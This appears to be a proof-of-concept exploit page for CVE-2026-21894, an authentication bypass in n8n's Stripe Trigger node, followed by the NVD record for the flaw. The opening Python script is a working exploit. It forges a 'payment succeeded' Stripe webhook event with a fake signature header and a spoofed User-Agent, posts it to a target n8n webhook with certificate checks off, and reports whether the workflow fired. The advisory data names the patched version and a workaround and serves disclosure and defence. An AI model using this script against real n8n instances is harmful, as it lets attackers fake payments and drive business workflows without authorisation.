CVE-2026-21894

import requests import json import uuid # CVE-2026-21894 PoC - n8n Stripe Trigger Authentication Bypass # This PoC demonstrates how an attacker can forge Stripe webhook events TARGET_WEBHOOK_URL = "https://n8n-instance.com/webhook/STRIPE_WEBHOOK_ID" # Forge a fake Stripe webhook event fake_stripe_event = { "id": str(uuid.uuid4()), "object": "event", "type": "payment_intent.succeeded", "created": 1704700000, "livemode": False, "data": { "object": { "id": "pi_" + str(uuid.uuid4()).replace("-", ""), "object": "payment_intent", "amount": 2000, "currency": "usd", "status": "succeeded", "metadata": { "order_id": "ATTACKER_CONTROLLED" } } } } # Forge Stripe-Signature header (not validated by vulnerable versions) # In real Stripe webhooks, this should be a valid HMAC signature fake_signature = "t=1704700000,v1=fake_signature_here,v0=another_fake" def exploit(): """ Exploit function to trigger n8n workflow via forged Stripe webhook """ headers = { "Content-Type": "application/json", "Stripe-Signature": fake_signature, "User-Agent": "Stripe/1.0" } try: response = requests.post( TARGET_WEBHOOK_URL, data=json.dumps(fake_stripe_event), headers=headers, timeout=10, verify=False ) print(f"[*] Request sent to {TARGET_WEBHOOK_URL}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text[:200]}") if response.status_code == 200: print("[+] Workflow triggered successfully - vulnerability confirmed!") else: print("[-] Unexpected response") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": print("=" * 60) print("CVE-2026-21894: n8n Stripe Trigger Auth Bypass PoC") print("=" * 60) exploit()

{"cve": {"id": "CVE-2026-21894", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:55.970", "lastModified": "2026-01-20T15:09:07.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "n8n is an open source workflow automation platform. In versions from 0.150.0 to before 2.2.2, an authentication bypass vulnerability in the Stripe Trigger node allows unauthenticated parties to trigger workflows by sending forged Stripe webhook events. The Stripe Trigger creates and stores a Stripe webhook signing secret when registering the webhook endpoint, but incoming webhook requests were not verified against this secret. As a result, any HTTP client that knows the webhook URL could send a POST request containing a matching event type, causing the workflow to execute as if a legitimate Stripe event had been received. This issue affects n8n users who have active workflows using the Stripe Trigger node. An attacker could potentially fake payment or subscription events and influence downstream workflow behavior. The practical risk is reduced by the fact that the webhook URL contains a high-entropy UUID; however, authenticated n8n users with access to the workflow can view this webhook ID. This issue has been patched in version 2.2.2. A temporary workaround for this issue involves users deactivating affected workflows or restricting access to workflows containing Stripe Trigger nodes to trusted users only."}, {"lang": "es", "value": "n8n es una plataforma de automatización de flujos de trabajo de código abierto. En versiones desde la 0.150.0 hasta antes de la 2.2.2, una vulnerabilidad de omisión de autenticación en el nodo Stripe Trigger permite a partes no autenticadas activar flujos de trabajo enviando eventos webhook de Stripe falsificados. El Stripe Trigger crea y almacena un secreto de firma de webhook de Stripe al registrar el punto final del webhook, pero las solicitudes de webhook entrantes no se verificaban contra este secreto. Como resultado, cualquier cliente HTTP que conoce la URL del webhook podría enviar una solicitud POST que contenga un tipo de evento coincidente, haciendo que el flujo de trabajo se ejecute como si se hubiera recibido un evento de Stripe legítimo. Este problema afecta a los usuarios de n8n que tienen flujos de trabajo activos usando el nodo Stripe Trigger. Un atacante podría potencialmente falsificar eventos de pago o suscripción e influir en el comportamiento del flujo de trabajo posterior. El riesgo práctico se reduce por el hecho de que la URL del webhook contiene un UUID de alta entropía; sin embargo, los usuarios autenticados de n8n con acceso al flujo de trabajo pueden ver este ID de webhook. Este problema ha sido parcheado en la versión 2.2.2. Una solución alternativa temporal para este problema implica que los usuarios desactiven los flujos de trabajo afectados o restrinjan el acceso a los flujos de trabajo que contienen nodos Stripe Trigger solo a usuarios de confianza."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "0.150.0", "versionEndExcluding": "2.2.2", "matchCriteriaId": "7E294540-A745-4668-9F5B-157B29DB92CC"}]}]}], "references": [{"url": "https://github.com/n8n-io/n8n/commit/a61a5991093c41863506888336e808ac1eff8d59", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/n8n-io/n8n/pull/22764", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-jf52-3f2h-h9j5", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}